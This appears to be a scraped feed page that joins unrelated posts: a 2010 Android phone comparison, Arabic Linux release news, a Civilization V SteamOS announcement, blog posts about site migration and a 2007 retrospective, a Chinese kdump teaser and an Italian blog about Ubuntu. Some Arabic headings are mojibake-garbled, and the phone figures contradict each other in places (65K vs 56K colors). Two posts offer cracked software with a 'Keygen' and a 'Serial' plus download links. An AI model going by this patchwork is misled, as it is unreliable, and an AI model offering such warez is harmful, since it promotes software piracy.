  3. Microsoft Exchange support not good/missing

  4. No live wallpapers

  5. Android 2.0 has better keyboard

  6. Android 1.6 Only supports 65K colors vs 16 million for 2.0/2.1

  7. Android 1.6 does not combine e-mail inboxes from multiple accounts in one page – does MediaScape offer this?

  8. Search functionality for all saved SMS and MMS messages

  9. Auto delete the oldest messages in a conversation when a defined limit is reached – does MediaScape provide this?

  10. Support for double-tap zoom

  11. No Bluetooth 2.1 (No Object Push Profile and Phone Book Access Profile) – MediaScape?

  12. Android 1.6 has no multi-touch support

  13. Android 1.6 has limited Speech-to-text support compared to 2.1 (All text fields!)

  14. Android 2.1 has additional home screens

          Guide for Picking The Best Android Phone for You        
Sony Xperia X10 vs Nexus One vs Motorola Droid vs Acer Liquid vs Archos

Xperia X10

Nexus One

Motorola Droid

Acer Liquid

(Updated: 21st Jan 2010) The Android handset landscape has changed drastically over the past year, from a literal handful of options to – the fingers on both your hands, the toes on both your feet and all the mistresses Tiger Woods has had in the past 24 hours (OK, maybe 4 hours). You get the point though, there are quite a few options and through the course of 2010 these options will only increase.

The only other mainstream handset smartphone option that rivals the Android handset options available in 2010 will be the Windows mobile platform – and we're all rushing for it – not!

So what are the handsets to consider in 2010? The ones currently released on the market that we will look at are the Acer Liquid and Motorola Droid and an additional three to be released early 2010, the Sony Xperia X10, Google Nexus One (Passion, HTC Bravo) and Archos Phone Tablet – though we only have a handful of details on the phone.

Archos Phone

We will look at hardware and software sub-categories, and compare the phones based based on the information we have.



The Nexus One and Sony Xperia X10 have the snappier Qualcomm Snapdragon 1Ghz processor onboard. The Acer Liquid has a downclocked version of the Snapdragon running at 728Mhz – perhaps to conserve battery. This would probably put the Acer Liquids performance more on par with the Motorola Droids. The Archos Phone promises to be a really fast phone with an upgraded ARM Cortex processor running at 1Ghz and also with improved GPU over Droid and iPhone.

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone

Qualcomm Snapdragon QSD 8250, 1.0 GHz

Texas Instruments OMAP 3430 550 Mhz

Qualcomm Snapdragon QSD 8250, 1.0 GHz

Qualcomm Snapdragon QSD 8250, 768 MHz

ARM Cortex 1Ghz


The Snapdragon's Adreno 200 Graphics core is phenomenal on the triangle render benchmark, coming in with a score of approximately 22 million triangles per/sec compared to approximately 7 million triangles/sec on the Motorola's SGX530. This is an important element for 3D graphics. Interestingly, the iPhone 3GS has a similar CPU to Motorola Droid but an upgraded faster SGX535 GPU which is capable of 28 million triangles/sec and 400 M Pixels/sec. Archos may get better SGX GPU.

Xperia X-10 Graphics Demo

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone

Adreno 200 Graphics Core with OpenGLES 2.0

PowerVR SGX530 Graphics Core with OpenGLES 2.0

Adreno 200 Graphics Core with OpenGLES 2.0

Adreno 200 Graphics Core with OpenGLES 2.0

PowerVR SGX540?

22 M Triangles/sec

7 M Triangles/sec

22 M Triangles/sec

22 M Triangles/sec

35 M Triangles/sec

133 M Pixels/sec

250 M Pixels/sec

133 M Pixels/sec

133 M Pixels/sec

1000 M Pixels/sec

HD Decode (720p)

HD Decode (720p)

HD Decode (720p)

HD Decode (720p)

3-D Graphics Benchmark

Motorola Droid 20.7 FPS (Android 2.0).

Nexus One 27.6 FPS. (Android 2.1)

Acer Liquid 34 FPS. (Android 1.6)

Xperia X10 34FPS+ est. (Android 1.6)

Note: All phones tested running WVGA resolution 480 x 800 or 480 X 854. Different versions of Android will be a factor e.g. Android 2.0 + reproduces 16 million colors vs 56K for 1.6. Older phones such as G1, iPhone 3GS may score 25-30 FPS but they use lower 480 X 320 resolution.


The Nexus One comes in with an impeccable 512MB of RAM. This provides an element of future proofing for the hardware and puts it in a league of its own. The Xperia X10 comes with 1GB of ROM and 384 MB of RAM. The 1GB means you'll be able to have twice as many apps on your phone until Google lets you save on your removable memory. The Acer Liquid and Droid are more or less the same.

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone


512 MB

256 MB

384 MB

256 MB


512 MB

512 MB

1024 MB

512 MB


The Nexus One uses an AMOLED screen which provides crispy images and more saturated colors than a TFT-LCD. It's also more energy efficient. Xperia X10 packs a 4.0 inch TFT screen with 854 x 480 resolution. Expect similar picture quality to the Motorola Droid for the Sony Ericson phone. The Archos Phone promises to deliver an interesting experience that could potentially make it the King of Androids.

Spot the difference: Top TFT-LCD screen and bottom OLED

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone

800 x 480 px, 3.7 in (94 mm), WVGA,


854 x 480 px, 3.7 in (94 mm), WVGA,


854 x 480 px, 4.0 in (102 mm), WVGA,


800 x 480 px, 3.5 in (89 mm), WVGA,


854x 480px, 4.3 in (109mm), WVGA, AMOLED

Display Input

All standard stuff here. All are pretty much Capacitative with multi-Touch depending on the continent you buy your phone from.

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone

Capacitative, Multi-Touch

Capacitative, Multi-Touch

Capacitative, Multi-Touch

Capacitative, Multi-Touch

Capacitative, Multi-Touch


The Xperia X10 has the largest battery – and might I add likely the best quality battery from the lot. It's the same battery used in the Xperia X1 and it performed admirable. Talk time for the Nexus One is very good and we expect the Xperia X10 to match this or be marginally better. Of concern is Nexus Ones 3G stand-by time of 250 hours. It's worse than the other phones but not bad at a little over 10 days! Updated 21st Jan 2010 - confirmed Xperia battery times. Xperia more or less performs at the same level as the other Android phones, delivering 5 hours talk time.

Sony 1500 mAh Battery

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone


1400 Li-Po

1400 Li-Po

1500 Li-Po

1350 Li-Po

Talk/Standby 3G







The phones are all capable of 3.5G (HSDPA 7.2 Mbit/s) data transfer. The Motorola Droid and Sony Xperia X10 can give you a little bit extra supporting 10.2 Mbit/s data transfer. Obviously the network must exist to support these speeds. Motorola is the only one with Class 12 EDGE, but this is not too important in this day and age of 3G.

Nexus One, Bravo

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone

HSDPA (Mbit/s)

7.2 (1700 band)





2.0 - 5.76





(850, 900,1800,1900)






Class 10

Class 12

Class 10

Class 10

UMTS band 1/4/8

















Nexus One is the only Android phone that currently offers 802.11n connectivity. In fact, I can't think of any other phone out there that also has 802.11n. This might be the Google Talk phone we all thought was heading our way after all! All phones have either bluetooth 2.0 or 2.1. These will essentially be the same as far as data transfer (3 Mbit/s) is concerned. Version 2.1 offers better power efficiency though and a few other enhancements.

Nexus One - Broadcom 802.11n

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone


2.1 + EDR

2.1 + EDR

2.1 + EDR

2.0 + EDR


802.11 b






802.11 g






802.11 n







The 2GB shipped micro-SD card with the Acer Liquid is unrealistic by todays standards. The Motorola Droid offers the best deal with a 16GB micro-SD. The Sony Xperia X10 is shipped with an 8GB micro-SD card, but remember the Xperia X10 also has that slightly bigger 1GB flash memory on-board as well for and impressive total of 9GB expandable to a total of 33GB. Google decided to save on costs by only offering a 4GB micro-SD card with the Nexus One, but if the idea is to compete against the iPhone then 8GB should be the minimum. Clearly the Motorola is on the right track with 16GB shipped, and you can't ignore the impressive 1GB ROM on the Xperia X10.

SanDisk working on 128GB Micro-SD

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone

Sim Card






3.5 mm jack






Micro USB





Shipped Micro SD/Supported (GB)


Class 2


Class 6




Class 2


Light Sensor





Proximity Sensor















Cell/Wifi Positioning






Case Material

The Motorola metal case is the sturdiest. Build quality for the Nexus One and Xperia X10 is very good. The Xperia X10 has a refelective plastic whilst the Nexus one is more industrial with teflon and metal on the bottom. Acer Liquid has average build quality, but that was always the intention with the Liquid in order to keep manufacturing costs low.

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone






If you want a physical keyboard then the Droid is your only choice in the list. The keys on the Droid keyboard are basically flush so you don't get the comfortable key separation feel on a Blackberry keyboard. The others (Droid as well) have virtual keyboards which work in portrait or landscape mode.

Droid Slide-out keyboard

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone







The Xperia X10 is one of the best camera phones. Sony used it's camera know how for their new smartphone lineup and it will be hard to match-up against Sony unless the other guys partner up with someone like Canon. The X10 comes with an 8.1 mp camera with X 16 digital zoom. The software has also been changed from standard Android to include typical camera options. Also included are a four face detection feature that recognizes faces in a photo and appropriately tags/files the photo. Motorola Droid comes in with a 5 mp camera with X4 digital zoom compared to the 5mp and x2 digital zoom on the Nexus One.

Xperia X10 sample photo

***Additional Photos***

Motorola Droid sample photo

Nexus One sample photo

Acer Liquid sample photo

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone







X 2

X 4





Y (dual)




Video wise, the Nexus One, Motorola Droid and Xperia will perform roughly the same.

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone

Video Res.











Lightest and thinest is the Nexus one. Motorola is weighed down by the metal used. They all are roughly the same size as the iPhone 3Gs which comes in at 115.5 x 62.1 x 12.3 mm and weighs 135g.

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone

Height (mm)





Width (mm)





Depth (mm)






Weight (g)






OS Level

Nexus One has the most current OS level at 2.1. Motorola Droid is expected to upgrade soon as well as the Acer Liquid. The heavily customized Xperia X10 will be more of a challenge to upgrade to 2.1 because of the heavy customization.

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone






Xperia X10 shines as far as demonstrating how customizable Android really is. The other 3 phones have very few changes to the standard Android OS.

Sony TimeScape/MediaScape

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone



Rachael UI

Acer UI 3.0

Application Market

We are likely to see more App market emerge. Sony currently leads the way and Motorola and HTC (Nexus One) will follow suit as well.

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone

Android Market

Android Market

PlayNow, Android Market

Android Market


Mediascape is an ambitious effort to add decent media functionality to Android. Sony succeeds and also introduces a fun way to organize your media. Acer has Spinlet which is not as complex as Mediascape.

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone





Social Networking

Sony again leds the customization way with Timescape. This is another good job by Sony to add extra functionality to Android. Timescape helps manage your contacts better and brings social networking and contacts onto one application.

Nexus One

Motorola Droid

Sony Xperia X10

Acer Liquid

Archos Phone





          Google vs. Apple        

The Android vs. iPhone battle is a fight reincarnated that we witnessed decades ago. It's a battle Apple once lost.

Google therefore decided to steal a page from a small startup called Microsoft and and their Windows OS. Google is doing this by offering Android on multiple hardware platforms compared to Apple that is doing what it has always done since the early 80's back - proprietary. Why won't Apple learn - well - because they still make money.

The advantage Google has over Apple, much like in the PC world, is they have companies that make cheap handsets and sell them - cheap. This obviously reduces Googles risk since they don't need to sell any hardware. This is analogous to the relationship between Dell, HP etc and Microsoft (back then Linux was not available). These companies put Android OS on their hardware because it's cheap (FREE) and thus increases Google market share.

Then you get the higher-end phones - with some surpassing the Apple hardware. Apple can't match the might of a collective market - Sony, Acer, Dell, HTC, Motorola, Samsung, LG, etc.

Apple will be bigger (turnover) than any single one of the hardware manufacturers. But combined they will account for more than 50%+ of handsets on the market in 2-3 years time.

Just like Microsoft, Google will have the leading OS for handsets. If hardware manufacturers just come up with a way to upgrade hardware - eg RAM, SD cards (doable)!, CPU, Battery (doable)! then it's the Microsoft+PC vs Apple+MAC battle. We all know Microsoft won that battle.

Let's not forget the direction Google hinted it wants to take for the payment system of Market Place - all Apps bought, will be charged through Carrier. It couldn't be any easier!


I think the Sony Xperia X10 is the Android phone to beat. It's iPhone competitor will be the 4G. The Sony Rachael UI (UX) is very impressive. The downside is the phone runs Android 1.6 which only support 65K colors, unlike Android 2.x wich support 16 million colors. The UI is tightly woven into android 1.6, could this be a problem when it comes to updating the OS?


1) 8MP with 16x digital zoom
2) Face recognition (automatically recognizes upto 5 faces in a Photo)
3) Smile Detection (Takes picture when you smile)
4) + all the usual stuff like video call, geo-tagging, camera/video flash etc.

1 Ghz Snapdragon

1 GB internal memory - 384MB RAM

4.1 Inch Capacitative (480 x 854 - WVGA)



1) Sony PlayNow - Music/Video/Game/Applications downloads
2) Sony TimeScape - Social Networking/Communication

3) Sony MediaScape - Media Player

4) Sony PS3 Remote Play (In development)


1) Layer

2) Speed Forge 3D


100+ Sony Accessories


HTC Bravo, Nexus One, Motorola Shadow (Rumoured) - AMOLED Touch screen, multi-mics, 5MP camera, 720p Video recording, HDMI port, 802.11 b/g/n

Nexus One:


iPhone 4G (June 2010) - 5MP, AMOLED, Video Calling, 802.11 b/g/n

Concept 4G:

          Ø´Ø±ÙƒØ© ديل باعت أجهزة محمولة بنظام لينكس بأكثر من عشرات الملايين الدولارات        
شركة ديل باعت أجهزة محمولة بنظام لينكس بأكثر من عشرات الملايين الدولارات


في أحد المقابلات المرئية قال  Barton George أحد مهندسي  شركة DELL ، أن  الشركة باعت أجهزة محمولة بقيمة عشرات الملايين دولارات محمل فيها نظام أوبنتو بشكل افتراضي.
ثم استطرد المهندس بالقول أن الاستثمار المبدئي كان فقط ٤٠ ألف دولار وخلال أربع سنوات وصلت المبيعات عشرات الملايين الدولارات.
وعندما سئل لماذا لا تثبتوا ردهات أو أوبن سوز  بشكل افتراضي؟ قال أن  الشركة  لا تريد أن  تشتت جهودها،  وأن  عملهم  في تعريفات الأجهزة سيرسل إلى  المنبع وبالتالي سيصل لتلك التوزيعات في النهاية.
لقد نمت مبيعات أجهزة ديل المخصصة للمطورين من جهاز واحد لتصبح الآن خط إنتاج يحمل الكثير من التنوعات تناسب معظم حاجيات المطورين.
يمكنك الاطلاع على خط إنتاج شركة ديل للمطورين من هنا.

Fahad الخميس, 2017/01/19 - 9:28ص

          ÙˆØ£Ø®ÙŠØ±Ø§ إطلاق لينكس منت ١٨ بواجهة كدي        
وأخيرا إطلاق لينكس منت ١٨ بواجهة كدي


بعد تأخر دام شهرين، صدرت لينكس منت ١٨ بواجهة كدي هذه الإصدارة ذات دعم طويل والتى ستظل مدعومة حتى ٢٠٢١م، أهم مميزات هذه الإصدارة أنها جاءت بإصدارة مستقرة من واجهة كدي بلازما ٥.٦ والتي تعتبر الأولى في مسيرة واجهة كدي ٥. 

وهذه الإصدارة جاءت بكل مميزات لينكس منت 18 الأساسية وهي شحن عفريت Thermald لمراقبة حساسات الحرارة  وحماية الجهاز من الاحتراق، و دعم نظام ملفات exFAT بشكل مسبق ، وإرجاع دعم نظام ملفات Btrfs. هذه الإصدارة مبنية على حزم Ubuntu 16.04 بشكل أساسي.
متطلبات النظام: ٢ جيجابايت ذاكرة و ١٠ جيجابايت قرص صلب.
لتنزيل هذه الإصدارة من هنا.

Fahad الجمعة, 2016/09/09 - 11:35م

          ØµØ¯ÙˆØ± لينكس منت ١٨        
صدور لينكس منت ١٨


وأخيرا أطلق مطوروا توزيعة لينكس منت الشهيرة الإصدارة لينكس منت ١٨ ، هذه الإصدارة ذات دعم طويل والتى ستظل مدعومة حتى ٢٠٢١م، أهم ما في هذه الإصدارة هي توحيد التطبيقات بين واجهات منت المعتمدة على مكتبة GTK+ ,وهي واجهة MATE  و Cinnamon.

أطلق على هذه التطبيقات X-Apps وهدفها الرئيسي هو استبدال تطبيقات جنوم التي لا تعمل إلا على منصة جنوم ٣  بتطبيقات تعمل على جميع أسطح مكتب GTK ويستفيد منها الجميع.
أهم مميزات هذه X-Apps :
١- تعتمد على مكتبات حديثة ومتطورة GTK3 و gsettings
2- تستخدم واجهات مستخدم تقليدية ( القوائم و شريط الأدوات ) خلاف تطبيقات جنوم ٣ الجديدة.
٣- تعمل في كل مكان فهي ليست مرتبطة بسطح مكتب معين أو توزيعة معينة.
تضم هذه التطبيقات حتى الآن : Xed محرر نصوص ، و Xviewer  عارض صور ، و Xreader  قارئ مستندات PDF ، و Xplayer  مشغل ملتميديا، Pix  مدير ومنظم صور.
الجدير بالذكر أه هذه التطبيقات لم تطور من الصفر ، بل اعتمدت على تطبيقات جنوم وبنت عليها ، بالإضافة إلى توفر تطبيقات جنوم الأساسية في المستودعات لم يرغب بها.

صور من تطبيقات X-apps

من الإضافات الجديدة في منت ١٨ هي سمة Mint-Y وهي خليفة سمة Mint-X والتي أطلقت عام ٢٠١٠م فبعد ست سنوات وتغير الكثير في عالم الواجهات قرر فريق التطوير أن يطور السمة ويطلق سمة Mint-Y التي بنيت على السمة الشهيرة Arc وأيقونات Moka، هذه السمة تعطيك منظر عصري ونظيف واحترافي على حد قول مطوري لينكس منت.

لمعرفة مميزات سطح مكتب Cinnamon الجديد تابع هذا الفيديو الشارح لمعظم المميزات الجديدة.

لتنزيل لينكس منت ١٨ من هنا.

Fahad الخميس, 2016/06/30 - 11:48م

          Ø¥Ø·Ù„اق Ubuntu 16.04        
إطلاق Ubuntu 16.04

وأخيرا أعلنت شركة كانونيكال عن إطلاق سادس إصدارة طويلة الدعم من نظامها أوبنتو.جاءت أوبنتو 16.04 بالعديد من المميزات الجديدة والتي تركز في أغلبها نحو تقنيات الخوادم و الحوسبة السحابية وإنترنت الأشياء.

فمن أهم مميزات هذه النسخة هي:
- تقديم صيغة جديدة لتوزيع البرمجيات وهي صيغة snap والتي تتميز بأنها آمنة و قوية.
- تقديم تقنية ZFS لأنظمة الملفات وهي تقنية متطورة جدا لإدارة الملفات واسترجاعها يمكنك التعرف على المزيد حولها في هذه المقالة.
- إضافة LXD كمدير خالص للحاويات لنظام OpenStack Mitaka
- دعم أنظمة  IBM Z and و LinuxONE من شركة أي بي أم.

أما من ناحية سطح المكتب فلم تطرأ الكثير من التحديثات الجذرية ولعل أهم المميزات الجديدة:
- استبعاد مركز برمجيات أوبنتو والاستعاضة عنه بمركز برمجيات جنوم.
- إمكانية نقل شريط يونتي إلى الأسفل.
- تحسين دعم الشاشات عالية الوضوح HiDPI.

من ناحية إصدارات البرمجيات فكالعادة تأتي هذه النسخة بآخر التطبيقات المستقرة وأهمها:
- نواة لينكس ٤.٤
- بايثون ٣.٥
- ليبر أوفيس ٥.١
- تطبيقات بيئة جنوم ٣.١٨

مشتقات أوبنتو ١٦.٤

صدرت كذلك مشتقات أوبنتو الرسمية وهي  Ubuntu MATE وKubuntu وXubuntu وLubuntu والفروقات عادة هي في نوعية سطح المكتب المستخدم بدلا عن سطح مكتب يونتي.


المميز في هذه الإصدارة وكعادة الإصدارات طويلة الدعم هو توفير الدعم الرسمي من شركة كانونيكال لمدة خمس سنوات بشكل مجاني من تاريخ صدور التوزيعة. وهذا يجعل هذه الإصدارة هي التي ينصح بها خلال السنتين القادمتين حتى صدور ١٨.٠٤.

تحميل أوبنتو ١٦.٤

تتوفّر أوبنتو على شكل أكثر من إصدار، واحد لسطح المكتب وآخر للخواديم وآخر للحوسبة السحابية، والأخير للمطورين، يمكنك اختيار الإصدار الذي يناسبك والمعمارية التي تناسب جهازك كذلك عبر زيارة الموقع الرسمي.

Fahad السبت, 2016/04/23 - 2:44م

          Introducing Sid Meier’s Civilization V for SteamOS        
Aspyr Media is pleased to announce our first Linux and SteamOS title, Sid Meier’s Civilization V. The SteamOS release includes all Civilization V DLC and expansion content, including Gods & Kings and Brave New World.

This release targets SteamOS on current gen hardware. Additionally, we're working towards supporting Ubuntu 14.04 as well as additional video cards in future updates.

Here’s where we need your help! To improve Civ V and future AAA games on SteamOS, we're looking for feedback. Tell us below what's working great or what's not working. If you're having any problems, please contact our support directly at http://support.aspyr.com/tickets/new
          Lazesoft Data Recovery Unlimited Edition 3.4 + Keygen        
Lazesoft Data Recovery Unlimited Edition
Lazesoft Data Recovery Unlimited Edition 3.4 + Keygen | 112 MB

Lazesoft Data Recovery offers home users and businesses complete solutions to recover deleted files or lost due to the format or corruption of a hard drive, virus or Trojan infection, unexpected system shutdown or software failure.

With easy to use interfaces and the most powerful data recovery software engine, you can using Lazesoft Data Recovery recover data by yourself, preview recovered files while the search is in progress.

Easy recovery in all major data loss cases.
Accidentally deleted files or emptied from recycle bin
Formatted media/disk drive/partitions/dynamic volumes
Logically crashed disk
Data deleted using Shift+Del keys
Files corrupted due to virus attacks
Software crash
Power faults
partition with corrupt file systems, etc.
Recover files even when your computer cannot boot up and cannot enter Windows.

Recover Data When Windows Cannot Boot up normally!
On some disk or Windows serious crashed, you might not be able to boot up your computer and enter Windows. Lazesoft Data Recovery can burn a bootable data recovery CD/USB and allow you to boot up your computer and rescue your data.
Boot from various brands of desktops, laptops like Dell, ThinkPad, Hp, Sony, Toshiba, Acer, Samsung, etc.
With WinPE-based and linux-base bootable disk builder, Lazesoft Recovery Suite has best hardware compatibility.
Boot up computer from CD or usb disk.
User friendly Boot Media Builder interface

Download Link
          Norton PartitionMagic 8.05 Build 1371 (Boot CD) + Serial        
Norton PartitionMagic 8.05
Norton PartitionMagic 8.05 Build 1371 (Boot CD) + Serial | 276.14 MB

Norton PartitionMagic lets you easily organize your hard drive by creating, resizing, copying, and merging disk partitions. Separate your operating system, applications, documents, music, photos, games, and backup files to reduce the risk of data loss if your system crashes. You can use Norton PartitionMagic 8.0 to run multiple operating systems safely.

Features :
  1. Divides a single hard drive into two or more partitions
  2. Lets you safely run multiple operating systems on the same PC
  3. BootMagic makes it easy to switch between different operating systems
  4. Allows you to copy, move, resize, split, or merge partitions as needed - without losing any data
  5. How-to wizards guide you step by step through the partitioning process
  6. Intuitive Windows-based browser lets you find, copy and paste files in both Windows and Linux partitions
  7. Allows you to create and modify partitions up to 300 GB
  8. Supports USB 2.0, USB 1.1, and FireWire® external drives
  9. Supports FAT, FAT32, NTFS, Ext2, and Ext3 file systems
  10. Converts partitions among FAT, FAT32, and NTFS without losing data
  11. Allows you to enlarge an NTFS partition without restarting your computer
  12. Resizes NTFS system clusters to the most effective size
Download Link

          Migration (almost) complete        

This weekend has seen a complete migration of An Architect's View from a very old version of BlogCFC (3.5.2) with a custom Fusebox 4.1 skin to the latest Mango Blog (1.4.3) as well as a complete migration of all of the content of the non-blog portion of corfield.org (my personal stuff, my C++ stuff and a bunch of stuff about CFML, Fusebox and Mach-II) from Fusebox to FW/1. I've moved from a VPS on HostMySite to an "enterprise cloud server" at EdgeWebHosting and I think it's all gone pretty smoothly although it's been a lot of work.

Hopefully I haven't broken too many URLs - I spent quite a bit of time working on Apache RewriteRules to try to make sure old URLs still work - but it has given me the opportunity to streamline a lot of the files on the site (can you imagine how much cruft can build up in eight years of running a site?).

What's left? Just the "recommended reading" bookstore portion of my old site. I store the book details in an XML file and process them in a CFC as part of the old Fusebox app (converted from Mach-II before that and from PHP before that). It's late and I can't face it tonight. Then I need to build out a Mango skin that looks like my old site (and eventually re-skin the non-blog portion of the site).

The underpinnings of the site are Apache, Railo ( at the time of writing), Tomcat (6.0.26 at the time of writing), Red Hat Linux, MySQL. I still have some fine-tuning to do but this is pretty much an out-of-the-box WAR-based install of Railo on Tomcat for this one site on the server. Over time I'll probably build out a home for FW/1 here under another domain, with examples and more documentation than is currently maintained on the RIAForge wiki. That's the plan anyway.

If you find any broken links, let me know (the Contact Me! link is in the right hand column, near the bottom).

          2007 in Retrospect        

As I did in 2006, here's my review of 2007. For some strange reason, I decided to make some New Year Resolutions in 2006. How did I do? I said I'd do more unit testing - and I did, but there's always room for more unit testing. I said I'd do more open source. Well, I released Fusebox 5.1 and Fusebox 5.5 as well as my Scripting project and a cfcUnit facade for CFEclipse so I think I did alright there. I also said I'd do more Flex and write some Apollo (now AIR) applications. I didn't do so well on those two! I think I'll revert to my usual practice of not making resolutions this year...

2007 was certainly a year of great change for me, leaving Adobe in April (a hot thread with 62 comments!) to become a freelance consultant, focusing on ColdFusion and application architecture. I also worked part-time on a startup through the Summer but consulting has been my main focus and continues to be my total business as we move into 2008.

2007 also saw me getting much more involved with the ColdFusion community, rejoining all the mailing lists that I hadn't had time to read with my role at Adobe, becoming an Adobe Community Expert for ColdFusion and then taking over as manager of the Bay Area ColdFusion User Group.

I also got to speak at a lot of conferences in 2007:

I also attended the Adobe Community Summit which was excellent!

ColdFusion frameworks were also very busy in 2007:

Adobe was extremely busy too:

  • Apollo (AIR) hit labs in March
  • The Scorpio prerelease tour (Ben came to BACFUG in April) with the ColdFusion 8 Public Beta in May and the full release in July
  • Creative Suite 3
  • Flex began its journey to open source
  • The Flex 3 and AIR Beta releases
  • Adobe Share

I had a number of rants:

Other good stuff from 2007:

          ä½¿ç”¨ Kdump 检查 Linux 内核崩溃        

kdump 是获取崩溃的 Linux 内核转储的一种方法,但是想找到解释其使用和内部结构的文档可能有点困难。在本文中,我将研究 kdump 的基本使用方法,和 kdump/kexec 在内核中是如何实现。

使用 Kdump 检查 Linux 内核崩溃,首发于文章 - 伯乐在线。

          ç³»ç»Ÿç®¡ç†å‘˜åº”该知道的 20 条 Linux 命令        


系统管理员应该知道的 20 条 Linux 命令,首发于文章 - 伯乐在线。

          come mi diverto a smanettare sul pc        
Tra le cose con cui mi tengo occupato il cervello per non pensare a me stesso, una posizione di rilievo la occupa la politica. Ma viste le ultime pesanti delusioni e l'impressione che per qualche anno è meglio lasciar perdere, questa sta cedendo il primo posto ad un'altra occupazione, l'informatica, o meglio, , anzi, !
Non fosse altro perché lui (lei?) mi riempie di soddisfazioni.

L'altro giorno (lunedì) la scheda, come previsto, è arrivata. Poi pausa per aspettare il mio informatico di fiducia ché mi fidavo poco delle mie capacità (nel mentre mi acculturavo su come smontare e rimontare tutti i componenti del pc con le spine inserite ad occhi chiusi e in meno di 1 minuto).
Lavoro (tutto da solo) per:
  • preparare (rimuovi i vecchi driver ATI)
  • estrarre la vecchia scheda
  • introdurre la nuova scheda
  • porconare per liberare un cavetto molex per l'alimentazione usando 1 coltello, 1 cutter ed un cacciavite per sollevare la fascetta in plastica e non segare con lei anche i cavi sottostanti
insomma... un parto.
Poi riavvio il PC, parte Ubuntu, risoluzione a 800x600 vabbè. Installo i driver per la Nvidia usando Envy; va tutto bene, ma la risoluzione resta 800x600.
Qui entra l'informatico di fiducia, che coinvolgo nel riconfigurare Xorg.
Alla fine va tutto, ma non .
Eh no! mi compro la scheda video figa, voglio Compiz!
In 2 ore ho incasinato tanto il sistema che quando ho spento sapevo che la soluzione per uscirne era formattare ed installare da zero tutto, approfittandone per passare alla nuova versione, la 8.04.

La mattina seguente installo i driver per Windows (e mi ricordo del perché ho smesso di usarlo), dovrei formattare e reinstallare tutto anche lì.
Quindi reinstallo Ubuntu dal cd, installo la .
Che dire?
Va che è una meraviglia.
          informatico mancato        
L'idea era quella di risolvere i problemi con Linux e dare una buona dose di potenza in più al PC; per questo domani dovrebbe arrivarmi una nuova scheda video, una Point of View 7600 GT, ovviamente nella versione per AGP (ho sudato ma alla fine l'ho trovata).
(risolvere i problemi di Linux = passare a Nvidia ed i suoi driver, lasciando l'ATI ai suoi problemi)

Idea brillante, avevo cercato bene, avevo controllato tutto quello che pensavo di dover controllare. Ed invece ho fatto i miei conti proprio male...

Nell'attesa della nuova arrivata ho pensato bene di pulire il case (che immaginavo zeppo di polvere). Aperto, ripulito con un panno le superfici esterne, spolverato e spulciato come potevo le superfici interne, alla fine avrò tolto un kilo di polvere...
All'apertura (la prima, visto che prima era in garanzia e poi non avevo validi motivi né voglia di smanettarci) ho notato che:

quelli che me l'hanno assemblato alla FRAEL hanno fatto un capolavoro: i cavi sono impacchettati benissimo, lasciando ampio spazio nel case; hanno anche aggiunto una ventola che non credevo prevista, garantendo un ottima circolazione dell'aria (che la polvere aveva provveduto a dimezzare); essendoci 2 prese USB "libere" hanno addirittura montato 4 porte USB aggiuntive sul retro (di cui solo 2 funzionanti, naturalmente). La domanda è lecita: cazzo me ne faccio di 8 porte USB? vabbè.

Alla fine, richiudendo dopo il lavoro certosino, ho fatto un paio di conti e mi son figurato i disastri che ci saranno domani...

L'alimentatore di sicuro non reggerà la scheda video / la scheda video richiederà un voltaggio doppio di quello supportato dalla mia scheda madre (questa non la sapevo ma l'ho appena letta sul manualetto dell'MB). Mi sto già vedendo a comprare un nuovo alimentatore, a staccare tutti i cavi mirabilmente piegati ed impacchettati, a rimettere i cavi nuovi disperato non ricordando come andavano...
O a vendere la scheda video nuova su E-Bay... :(
eccheppalle... uno non può nemmeno comprare una scheda video...

Fino a prima di queste scoperte l'hardware mi sembrava un argomento affascinante
          il mio Ubuntu        
Dopo un paio di settimane di uso continuo posso proprio dirlo: ma quanto mi piace !
Da quando lo uso non ho più acceso Winzozz XP, salvo un paio di volte per fare il confronto.

Tutto rose e fiori? no, certamente no; la mia scheda video ha dei driver cani che mi impallano X (almeno penso sia quello il problema), quindi ho dovuto disabilitare tutte quelle belle cose 3D con cui tirarsela, e comunque tende ad andare molto lento in certe situazioni (ma io lo stresso).

Però ho tutti i programmi che mi servono:
  • Firefox
  • Thunderbird
  • Pidgin
  • Rhythmbox (molto bella novità)
  • OpenOffice
  • ...e una scarrellata di programmi con cui fare di tutto, tutti immancabilmente Free.

Pensare che tutto questo software, con tutto il lavoro che ci sta dietro, sia gratis, anzi, più che gratis, mi fa girare la testa e un qualche senso di colpa mi viene:
io che gli do in cambio?
Prima o poi mi cimenterò nelle traduzioni, magari, che mi sembrano l'unica cosa nella quale si possa contribuire senza far danni micidiali :-)

Pro rispetto a Winzozz XP?
non ho pagato per averlo, mentre il caro Winzozz costò la bellezza di 128 euro ivati; non mi sembra un dettaglio da poco!
Altro pro?
L'interfaccia grafica semplice, personalizzabile, molto più usabile e comoda di quella winzozziana (che è decisamente datata...)
Altro pro è la trasparenza: non so che farmene dei codici sorgente del software che ho installato, ma sapere che c'è una comunità di sviluppatori che controlla il "come" è fatto un software e quello che fa mi fa stare molto tranquillo; con Winzozz i comportamenti strani / che sfuggivano dalla mia volontà erano molti, senza contare che nessuno poteva sapere cosa faceva "veramente" il software... e perché ogni 3 mesi volesse controllare se la mia copia era originale?...
